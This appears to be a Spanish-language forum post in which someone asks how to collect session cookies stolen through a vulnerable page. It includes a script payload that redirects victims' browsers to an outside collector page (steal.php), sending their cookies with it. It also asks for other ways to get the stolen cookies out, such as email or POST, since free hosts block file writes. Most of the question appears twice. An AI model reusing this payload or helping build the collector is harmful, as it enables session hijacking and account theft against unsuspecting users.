Hola.. en un escenario típico donde una página es vulnerable a rediregir los navegadores, con el código:
para que luego steal.php grabe la variable cookie.. con el contenido de la cookie en un archivo log.txt digamos.. Pero ahora.. qué sitio permite grabar el texto, con la información obtenida? Es decir, la mayoría de servidores gratuitos no otorgan permiso de escritura en sus archivos..
Habría alguna forma alternativa.. de quizás, enviar el valor de 'cookie' usando steal.php.. pero a algún correo por ejemplo? O usando POST /formulario?=cookie.. Desde dónde podría ver el archivo que registra el steal.php que contiene $cookie = $_GET['cookie'];?
Código [Seleccionar]
<script>window.location=site.com/steal.php?cookie='+document.cookie;</script>
para que luego steal.php grabe la variable cookie.. con el contenido de la cookie en un archivo log.txt digamos.. Pero ahora.. qué sitio permite grabar el texto, con la información obtenida? Es decir, la mayoría de servidores gratuitos no otorgan permiso de escritura en sus archivos..
Habría alguna forma alternativa.. de quizás, enviar el valor de 'cookie' usando steal.php.. pero a algún correo por ejemplo? O usando POST /formulario?=cookie.. Desde dónde podría ver el archivo que registra el steal.php que contiene $cookie = $_GET['cookie'];?